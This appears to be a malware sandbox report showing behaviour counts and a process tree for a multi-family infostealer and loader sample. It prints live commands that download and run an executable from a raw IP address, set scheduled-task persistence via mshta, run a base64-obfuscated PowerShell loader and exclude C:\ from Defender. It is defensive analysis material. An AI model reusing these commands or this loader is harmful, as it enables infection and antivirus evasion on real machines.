Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1512 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3500 powershell.exe 3500 powershell.exe 3080 TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE 3080 TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE 184 rapes.exe 184 rapes.exe 1512 powershell.exe 1512 powershell.exe 1512 powershell.exe 464 powershell.exe 464 powershell.exe 464 powershell.exe 5448 powershell.exe 5448 powershell.exe 5448 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4880 powershell.exe 4880 powershell.exe 4880 powershell.exe 2556 rapes.exe 2556 rapes.exe 1204 powershell.exe 1204 powershell.exe 1204 powershell.exe 5784 MSBuild.exe 5784 MSBuild.exe 5784 MSBuild.exe 5784 MSBuild.exe 12764 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12912 8fe1ZIHI3C10.exe 12912 8fe1ZIHI3C10.exe 12912 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12912 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12912 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12912 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12912 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 12912 8fe1ZIHI3C10.exe 13032 8fe1ZIHI3C10.exe 13032 8fe1ZIHI3C10.exe 12912 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 13032 8fe1ZIHI3C10.exe 12912 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 13032 8fe1ZIHI3C10.exe 12912 8fe1ZIHI3C10.exe 12764 8fe1ZIHI3C10.exe 13032 8fe1ZIHI3C10.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1776 u75a1_003.exe 1776 u75a1_003.exe 1776 u75a1_003.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeDebugPrivilege 3500 powershell.exe Token: SeDebugPrivilege 1512 powershell.exe Token: SeDebugPrivilege 464 powershell.exe Token: SeDebugPrivilege 5448 powershell.exe Token: SeDebugPrivilege 4500 powershell.exe Token: SeDebugPrivilege 4880 powershell.exe Token: SeDebugPrivilege 1204 powershell.exe Token: SeDebugPrivilege 12764 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 12912 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 13032 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 13116 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 13240 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 6208 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 6340 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 6524 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 6628 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 6760 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 7040 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 3372 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 7268 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 7628 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 6104 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 8204 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 8484 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 8860 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 9072 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 9228 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 9428 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 9608 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 10220 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 10444 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 10620 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 10792 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 10988 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 11164 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 11284 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 11488 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 11704 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 11896 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 4128 taskkill.exe Token: SeDebugPrivilege 12276 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 4916 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 12396 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 12552 taskkill.exe Token: SeDebugPrivilege 228 taskkill.exe Token: SeDebugPrivilege 6236 8fe1ZIHI3C10.exe Token: SeDebugPrivilege 7692 taskkill.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
pid Process 3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 12088 751a73f7f3.exe 12088 751a73f7f3.exe 12088 751a73f7f3.exe 12088 751a73f7f3.exe 12088 751a73f7f3.exe 12088 751a73f7f3.exe 12088 751a73f7f3.exe -
Suspicious use of SendNotifyMessage 10 IoCs
pid Process 3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 12088 751a73f7f3.exe 12088 751a73f7f3.exe 12088 751a73f7f3.exe 12088 751a73f7f3.exe 12088 751a73f7f3.exe 12088 751a73f7f3.exe 12088 751a73f7f3.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3224 wrote to memory of 3368 3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3224 wrote to memory of 3368 3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3224 wrote to memory of 3368 3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3224 wrote to memory of 408 3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3224 wrote to memory of 408 3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3224 wrote to memory of 408 3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3368 wrote to memory of 2028 3368 cmd.exe 89 PID 3368 wrote to memory of 2028 3368 cmd.exe 89 PID 3368 wrote to memory of 2028 3368 cmd.exe 89 PID 408 wrote to memory of 3500 408 mshta.exe 92 PID 408 wrote to memory of 3500 408 mshta.exe 92 PID 408 wrote to memory of 3500 408 mshta.exe 92 PID 3500 wrote to memory of 3080 3500 powershell.exe 97 PID 3500 wrote to memory of 3080 3500 powershell.exe 97 PID 3500 wrote to memory of 3080 3500 powershell.exe 97 PID 3080 wrote to memory of 184 3080 TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE 100 PID 3080 wrote to memory of 184 3080 TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE 100 PID 3080 wrote to memory of 184 3080 TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE 100 PID 184 wrote to memory of 1760 184 rapes.exe 104 PID 184 wrote to memory of 1760 184 rapes.exe 104 PID 184 wrote to memory of 1760 184 rapes.exe 104 PID 1760 wrote to memory of 5236 1760 cmd.exe 106 PID 1760 wrote to memory of 5236 1760 cmd.exe 106 PID 1760 wrote to memory of 5236 1760 cmd.exe 106 PID 5236 wrote to memory of 1512 5236 cmd.exe 108 PID 5236 wrote to memory of 1512 5236 cmd.exe 108 PID 5236 wrote to memory of 1512 5236 cmd.exe 108 PID 1512 wrote to memory of 464 1512 powershell.exe 109 PID 1512 wrote to memory of 464 1512 powershell.exe 109 PID 1512 wrote to memory of 464 1512 powershell.exe 109 PID 184 wrote to memory of 6060 184 rapes.exe 111 PID 184 wrote to memory of 6060 184 rapes.exe 111 PID 184 wrote to memory of 6060 184 rapes.exe 111 PID 6060 wrote to memory of 32 6060 cmd.exe 113 PID 6060 wrote to memory of 32 6060 cmd.exe 113 PID 6060 wrote to memory of 32 6060 cmd.exe 113 PID 32 wrote to memory of 5448 32 cmd.exe 115 PID 32 wrote to memory of 5448 32 cmd.exe 115 PID 32 wrote to memory of 5448 32 cmd.exe 115 PID 5448 wrote to memory of 4500 5448 powershell.exe 116 PID 5448 wrote to memory of 4500 5448 powershell.exe 116 PID 5448 wrote to memory of 4500 5448 powershell.exe 116 PID 184 wrote to memory of 1776 184 rapes.exe 118 PID 184 wrote to memory of 1776 184 rapes.exe 118 PID 184 wrote to memory of 1776 184 rapes.exe 118 PID 1776 wrote to memory of 1884 1776 u75a1_003.exe 119 PID 1776 wrote to memory of 1884 1776 u75a1_003.exe 119 PID 1776 wrote to memory of 4884 1776 u75a1_003.exe 120 PID 1776 wrote to memory of 4884 1776 u75a1_003.exe 120 PID 1884 wrote to memory of 4880 1884 cmd.exe 126 PID 1884 wrote to memory of 4880 1884 cmd.exe 126 PID 184 wrote to memory of 5556 184 rapes.exe 127 PID 184 wrote to memory of 5556 184 rapes.exe 127 PID 5556 wrote to memory of 5784 5556 ae9ccc196b.exe 130 PID 5556 wrote to memory of 5784 5556 ae9ccc196b.exe 130 PID 5556 wrote to memory of 5784 5556 ae9ccc196b.exe 130 PID 5556 wrote to memory of 5784 5556 ae9ccc196b.exe 130 PID 5556 wrote to memory of 5784 5556 ae9ccc196b.exe 130 PID 5556 wrote to memory of 5784 5556 ae9ccc196b.exe 130 PID 5556 wrote to memory of 5784 5556 ae9ccc196b.exe 130 PID 5556 wrote to memory of 5784 5556 ae9ccc196b.exe 130 PID 5556 wrote to memory of 5784 5556 ae9ccc196b.exe 130 PID 1512 wrote to memory of 1796 1512 powershell.exe 132 PID 1512 wrote to memory of 1796 1512 powershell.exe 132 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn OjCESma0GQ6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\mWP0iAltw.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn OjCESma0GQ6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\mWP0iAltw.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2028
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\mWP0iAltw.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Users\Admin\AppData\Local\TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE"C:\Users\Admin\AppData\Local\TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:184 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:464
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /K CHCP 4379⤵
- System Location Discovery: System Language Discovery
PID:1796 -
C:\Windows\SysWOW64\chcp.comCHCP 43710⤵
- System Location Discovery: System Language Discovery
PID:752
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:'"10⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe"C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe"9⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:12764
-
-
C:\Users\Admin\AppData\Local\Temp\4dlzDAIffoKl.exe"C:\Users\Admin\AppData\Local\Temp\4dlzDAIffoKl.exe"9⤵PID:12560
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369631121\8BNn7ce.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6060 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369631121\8BNn7ce.cmd"7⤵
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgI